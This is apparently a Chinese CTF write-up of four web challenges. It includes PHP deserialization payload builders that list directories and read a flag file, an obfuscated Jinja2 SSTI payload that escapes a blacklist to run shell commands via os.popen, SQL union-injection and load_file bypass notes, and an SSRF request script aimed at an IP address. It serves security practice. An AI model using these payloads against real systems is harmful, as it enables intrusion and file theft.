ez_serialize
直接看源码
<?php
// Warnings and notices are silenced for the whole request, and the script then
// prints its own source, which is how the player gets to see this listing.
error_reporting(0);
highlight_file(__FILE__);
/**
 * Challenge class (ez_serialize).
 *
 * The constructor hard-codes $class/$para, but unserialize() never runs the
 * constructor: it restores the public properties from the payload and then
 * calls __wakeup(), which re-uses them in `new $class($para)`. Whoever
 * controls the serialized string therefore chooses which class is
 * instantiated and with what string argument, limited only by the character
 * blacklist in C::vaild().
 */
class A
{
    public $class;
    public $para;
    public $check;

    public function __construct()
    {
        $this->class = "B";
        $this->para = "ctfer";
        $this->spawn();
    }

    /**
     * Runs after unserialize() has restored the properties. Both strings are
     * passed through C::vaild(); that filter only rejects a few punctuation
     * characters, so letters, digits, '/' and '.' (class names, file paths)
     * are accepted. The second check is short-circuited when the first fails.
     */
    public function __wakeup()
    {
        $this->check = new C;
        $accepted = $this->check->vaild($this->para) && $this->check->vaild($this->class);
        if (!$accepted) {
            die('bad hacker~');
        }
        $this->spawn();
    }

    /** Instantiates the class named in $class with $para and echoes the object. */
    private function spawn()
    {
        $target = $this->class;
        echo new $target($this->para);
    }
}
/**
 * Default target of A: stores the constructor argument and greets it.
 * The greeting is printed from the constructor itself, which is why the page
 * shows "hello ctfer" although B defines no __toString().
 */
class B
{
    public $a;

    public function __construct($a)
    {
        $this->a = $a;
        echo "hello {$this->a}";
    }
}
/**
 * Character blacklist used by A::__wakeup() on both deserialized strings.
 */
class C
{
    /**
     * Returns true when $code contains none of the blacklisted characters.
     * Note what is NOT rejected: letters, digits, '/', '.', '_', '(' and ')'
     * all pass, so a class name or an absolute file path is "valid" input.
     * Inside the character class the '|' is a literal pipe, not alternation,
     * so '|' itself is blacklisted as well.
     */
    function vaild($code)
    {
        $blacklist = '/[!|@|#|$|%|^|&|*|=|\'|"|:|;|?]/i';
        return !preg_match($blacklist, $code);
    }
}
// Entry point. Calling unserialize() on a raw query parameter is the bug:
// the payload decides which properties A is restored with, and __wakeup()
// then runs on that object. Without ?pop the constructor path runs instead,
// which is what printed "hello ctfer" below.
if(isset($_GET['pop'])){
unserialize($_GET['pop']);
}
else{
$a=new A;
} hello ctfer
提示得很明显了：class 是要实例化的类名，para 是传给构造函数的参数，只是我不知道该实例化什么类。。。
echo new $this->class ($this->para);
用FilesystemIterator遍历目录
<?php
/**
 * Payload builder: a stripped-down A holding only the two properties that
 * unserialize() restores (methods are not part of the serialized form).
 * FilesystemIterator takes a directory path in its constructor, and its
 * __toString() (inherited from DirectoryIterator) yields an entry name, which
 * is what the echo in A::__wakeup() prints.
 */
class A
{
    public $class = "FilesystemIterator";
    public $para = "/var/www/html";
}
// Print the serialized payload that is then passed as ?pop= to the challenge.
echo serialize(new A());
用SplFileObject读取文件
<?php
/**
 * Payload builder for the file-read step: same property layout as the
 * challenge's A, with SplFileObject as the class and the file path as its
 * constructor argument. SplFileObject's __toString() returns a line of the
 * file, so the echo in A::__wakeup() prints file content.
 */
class A
{
    public $class = "SplFileObject";
    public $para = "/var/www/html/1aMaz1ng_y0u_c0Uld_f1nd_F1Ag_hErE/flag.php";
}
// Print the serialized payload for the SplFileObject read.
echo serialize(new A());
baby flask
直接给出过滤的信息。。。限制得可真全啊
<!--
Hi young boy!</br>
Do you like ssti?</br>
blacklist</br>
'.','[','\'','"',''\\','+',':','_',</br>
'chr','pop','class','base','mro','init','globals','get',</br>
'eval','exec','os','popen','open','read',</br>
'select','url_for','get_flashed_messages','config','request',</br>
'count','length','0','1','2','3','4','5','6','7','8','9','0','1','2','3','4','5','6','7','8','9'</br>
</br>
-->
很轻松发现ssti点
这题应该是极其复杂的编码拼接(/(ㄒoㄒ)/~~
学到了利用过滤器
('__clas','s__')|join
dict(__clas=a,s__=b)|join
"__claee__"|replace("ee","ss")
贴一下别的师傅的wp
{% set id=dict(ind=a,ex=a)|join%}{% set pp=dict(po=a,p=a)|join%}{% set ls=dict(ls=a)|join%}{% set ppe=dict(po=a,pen=a)|join%}{% set gt=dict(ge=a,t=a)|join%}{% set cr=dict(ch=a,r=a)|join%}{% set nn=dict(n=a)|join%}{% set tt=dict(t=a)|join%}{% set ff=dict(f=a)|join%}{% set ooqq=dict(o=a,s=a)|join %}{% set rd=dict(re=a,ad=a)|join%}{% set five=(lipsum|string|list)|attr(id)(tt) %}{% set three=(lipsum|string|list)|attr(id)(nn) %}{% set one=(lipsum|string|list)|attr(id)(ff) %}{% set shiba=five*five-three-three-one %}{% set xiahuaxian=(lipsum|string|list)|attr(pp)(shiba) %}{% set gb=(xiahuaxian,xiahuaxian,dict(glob=a,als=a)|join,xiahuaxian,xiahuaxian)|join %}{% set bin=(xiahuaxian,xiahuaxian,dict(builtins=a)|join,xiahuaxian,xiahuaxian)|join %}{% set chcr=(lipsum|attr(gb))|attr(gt)(bin)|attr(gt)(cr) %}{% set xiegang=chcr(three*five*five-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one)%}{% set space=chcr(three*three*five-five-five-three) %}{% set shell=(ls,space,xiegang,dict(var=a)|join,xiegang,dict(www=a)|join,xiegang,dict(flask=a)|join)|join %}{{(lipsum|attr(gb))|attr(gt)(ooqq)|attr(ppe)(shell)|attr(rd)()}}
BEST_DB
很直白的一个sql注入
这题并没有过滤 " ,并且过滤的空格可以轻松用%20或/**/进行绕过
不过值得注意的是 直接在框框内输入并不会有回显 进行url编码后貌似就不可以了
直接用联合注入 爆库
得到flag.txt文件
用load_file()读取 /flag.txt文件即可
由于过滤了 / ,可以用编码绕过 但别忘了前面要加个 0x
一开始在load_file()里面加了个"" ,结果死活不对。。。
easy_login
<?php
// A session must already exist: nothing in this file calls session_start().
if (!isset($_SESSION)) {
    highlight_file(__FILE__);
    die("no session");
}
include("./php/check_ip.php");
error_reporting(0);

// check_inner_ip() comes from the included file (not shown); judging by the
// message in the failure branch it returns true for URLs that are NOT internal.
// error_reporting(0) is already in effect, so a missing ?url= only raises a
// silenced notice and $url becomes null.
$url = $_GET['url'];
if (!check_inner_ip($url)) {
    echo "Your IP is internal yoyoyo";
} elseif ($url) {
    // The check above looked at the string the user supplied, but
    // CURLOPT_FOLLOWLOCATION makes curl follow redirects to a destination that
    // is never re-checked, and CURLOPT_RETURNTRANSFER=0 writes the response
    // body straight into the page. A defensive version would re-validate the
    // resolved address on every hop or disable redirect following.
    $handle = curl_init();
    curl_setopt($handle, CURLOPT_URL, $url);
    curl_setopt($handle, CURLOPT_RETURNTRANSFER, 0);
    curl_setopt($handle, CURLOPT_HEADER, 0);
    curl_setopt($handle, CURLOPT_FOLLOWLOCATION, 1);
    $output = curl_exec($handle);
    $result_info = curl_getinfo($handle);
    curl_close($handle);
}
?>
# -*- coding: utf-8 -*-
import requests
# Builds the request the page describes: the ?url= parameter feeds the
# server-side curl fetch, while the PHP_SESSION_UPLOAD_PROGRESS form field
# together with a PHPSESSID cookie makes PHP create a session (see the note
# below), so the isset($_SESSION) gate in the PHP source passes.
target = 'http://183.129.189.60:10015/?url=http://localhost/admin.php'
form_fields = {'PHP_SESSION_UPLOAD_PROGRESS': 'nmd'}
upload = {'file': 'r.txt'}
session_cookie = {'PHPSESSID': 'nmd'}
response = requests.post(target, data=form_fields, files=upload, cookies=session_cookie)
print(response.text)
加入了PHP_SESSION_UPLOAD_PROGRESS 相当于session_start
可以参考buuctf中的 (PWN。。。)baby_ctf
几乎是一模一样 emmmm。。。有抄袭嫌疑